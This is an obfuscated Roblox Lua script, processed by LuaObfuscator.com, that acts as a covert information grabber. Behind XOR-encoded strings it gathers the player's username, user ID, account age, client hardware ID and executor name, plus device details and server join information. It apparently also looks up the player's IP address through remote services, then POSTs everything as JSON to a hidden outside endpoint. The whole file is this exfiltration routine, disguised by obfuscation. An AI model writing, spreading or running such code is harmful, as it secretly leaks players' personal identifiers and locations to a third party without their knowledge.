--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v32,v33) local v34={};for v49=1, #v32 do v6(v34,v0(v4(v1(v2(v32,v49,v49 + 1 )),v1(v2(v33,1 + (v49% #v33) ,1 + (v49% #v33) + 1 )))%256 ));end return v5(v34);end local v8=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165"));local v10=game:GetService(v7("\25\182\91\29\185\50\86\56\182\74\19\143\35\84\34\190\74\19","\38\84\215\41\118\220\70"));local v11=game:GetService(v7("\101\5\39\0\215\94\6\55\6\205\85\4\52\27\253\85","\158\48\118\66\114"));local v12=game:GetService(v7("\140\49\25\5\118\183\237\162\39\21","\155\203\68\112\86\19\197"));local v13=v9.LocalPlayer;local v14=v13.UserId;local v15=v13.DisplayName;local v16=v13.Name;local v17=tostring(v13.MembershipType):sub(21);local v18=v13.AccountAge;local v19=game.LocalizationService.RobloxLocaleId;local v20=game:HttpGet(v7("\78\201\34\236\83\34\170\183\80\137\120\245\68\125\235\236\8\208\51\179","\152\38\189\86\156\32\24\133"));local v21=game:HttpGet(v7("\244\67\179\86\166\24\232\79\236\26\166\86\245\25\164\73\241\24\173\85\243\89","\38\156\55\199"));local v22=game:GetService(v7("\154\127\100\9\29\117\246\90\188\116\127\59\32\113\232\85\161\126\121","\35\200\29\28\72\115\20\154")):GetClientId();local v23=v7("\43\176\211\211\130\52\122\62\190\220\218\161\45\33\23\188\217\218\159\98\62\22\182\223\248\140\33\49\48\177\194\203\140\34\55\28\247","\84\121\223\177\191\237\76")   .. game.PlaceId   .. ', "'   .. game.JobId   .. '")' ;local v24=string.format("game:GetService('TeleportService'):TeleportToPlaceInstance(%d, '%s')",game.PlaceId,game.JobId);local function v25() local v35=0;local v36;while true do if (v35==0) then v36=((type(identifyexecutor)==v7("\189\67\199\163\46\89\63\207","\161\219\54\169\192\90\48\80")) and identifyexecutor()) or ((type(getexecutorname)==v7("\79\87\14\38\93\75\15\43","\69\41\34\96")) and getexecutorname()) or v7("\137\205\220\4\13\60\178","\75\220\163\183\106\98") ;return v36;end end end local v26=v10:GetProductInfo(game.PlaceId).Name;local function v27() local v37=0 -0 ;local v38;local v39;while true do if ((937 -(39 + 896))==v37) then v39.viewportSize=tostring(workspace.CurrentCamera.ViewportSize);return v38,v39;end if ((1 -0)==v37) then if v12:IsTenFootInterface() then v38=v7("\232\51\41\245\209\166\206","\202\171\92\71\134\190");elseif (v11.TouchEnabled and  not v11.MouseEnabled) then local v54=0 -0 ;local v55;while true do if (0==v54) then v38=v7("\4\206\46\129\37\196","\232\73\161\76");v55=workspace.CurrentCamera.ViewportSize;v54=2 -1 ;end if (v54==2) then v39.isTablet=((v55.Y>(323 + 277)) and v7("\191\241\48\81\253\179","\199\235\144\82\61\152")) or v7("\55\30\182\37\2","\75\103\118\217") ;break;end if ((1 + 0)==v54) then v39.screenResolution=string.format(v7("\254\221\90\24\26","\126\219\185\34\61"),v55.X,v55.Y);v39.deviceOrientation=((v55.X>v55.Y) and v7("\32\207\80\118\109\116\242\247\9","\135\108\174\62\18\30\23\147")) or v7("\134\230\56\223\10\175\58\211","\167\214\137\74\171\120\206\83") ;v54=398 -(115 + 281) ;end end else v38=v7("\227\81\99\31\173\17\215","\126\167\52\16\116\217");v39.hasKeyboard=v11.KeyboardEnabled;v39.hasMouse=v11.MouseEnabled;v39.hasTouch=v11.TouchEnabled;v39.hasGamepad=v11.GamepadEnabled;end v39.graphicsQuality=UserSettings().GameSettings.SavedQualityLevel;v37=4 -2 ;end if (v37==(0 + 0)) then local v53=0;while true do if ((2 -1)==v53) then v37=3 -2 ;break;end if (v53==(867 -(550 + 317))) then v38=v7("\55\180\128\57\214\21\180","\185\98\218\235\87");v39={};v53=1;end end end end end local function v28() local v40,v41=v27();local v42={[v7("\204\39\51\144\184\24\229\230\47\45\133","\156\168\78\64\224\212\121")]=v15,[v7("\18\253\160\220\9\239\168\203","\174\103\142\197")]=v16,[v7("\67\59\90\42\12\90","\152\54\72\63\88\69\62")]=v14,[v7("\217\193\227\94\209\214\253\84\221\212\218\69\196\193","\60\180\164\142")]=v17,[v7("\89\93\6\38\50\227\6\121\89\0","\114\56\62\101\73\71\141")]=v18,[v7("\187\230\206\202\172\251\194","\164\216\137\187")]=v19,[v7("\219\246","\107\178\134\81\210\198\158")]=v20,[v7("\48\25\139\194","\202\88\110\226\166")]=v22,[v7("\199\14\150\242","\170\163\111\226\151")]=os.date(v7("\84\61\253\125\74\120\108\40","\73\113\80\210\88\46\87")),[v7("\149\37\192\23","\135\225\76\173\114")]=os.date(v7("\95\213","\199\122\141\216\208\204\221")),[v7("\169\216\6\249\123\243\153\196\0\245","\150\205\189\112\144\24")]=v40,[v7("\33\129\169\69\7\141\53\21\49\133\182\64\23","\112\69\228\223\44\100\232\113")]=v8:JSONEncode(v41),[v7("\211\30\10\214\152\125\139\209","\230\180\127\103\179\214\28")]=v26,[v7("\156\9\94\69\225\104\228","\128\236\101\63\38\132\33")]=game.PlaceId,[v7("\165\185\48\84\191\207\206\184\168","\175\204\201\113\36\214\139")]=v21,[v7("\68\195\59\207\11\75\201\31\211\6\110\200","\100\39\172\85\188")]=v23,[v7("\161\109\184\170\60\164\118\154\143\55\168","\83\205\24\217\224")]=v24,[v7("\227\221\200\62\243\209\194\47\200\196\192\56","\93\134\165\173")]=v25()};return v42;end local function v29(v43,v44) local v45=0 -0 ;local v46;local v47;local v48;while true do if (v45==0) then v46=v8:JSONEncode(v44);v47={[v7("\157\253\207\214\63\192\166\51\138\235\209\199","\30\222\146\161\162\90\174\210")]=v7("\228\94\96\6\236\77\113\30\236\65\126\69\239\93\127\4","\106\133\46\16")};v45=1 -0 ;end if (v45==1) then v48=http_request or v48 or HttpPost or syn.request ;v48({[v7("\109\50\127","\32\56\64\19\156\58")]=v43,[v7("\119\205\241\94\85\246","\224\58\168\133\54\58\146")]=v7("\105\121\120\201","\107\57\54\43\157\21\230\231"),[v7("\243\142\16\241\188\206\220","\175\187\235\113\149\217\188")]=v47,[v7("\30\160\133\85","\24\92\207\225\44\131\25")]=v46});break;end end end local v30=v7("\67\199\172\92\8\39\4\156\171\79\9\116\91\199\246\75\20\114\76\223\189\2\24\114\70\156\181\77\24\111\68\192\247\95\84\92\96\213\161\79\25\101\115\233\136\73\3\94\111\241\235\70\58\85\102\209\160\30\3\109\74\131\158\99\73\126\79\131\233\124\54\36\93\223\149\127\43\75\103\215\174\92\36\126\103\216\158\88\29\74\26\227\140\106\77\107\71\236\176\73\45\71\102\139\190\100\19\50\78\203\189\79","\29\43\179\216\44\123");local v31=v28();v29(v30,v31);
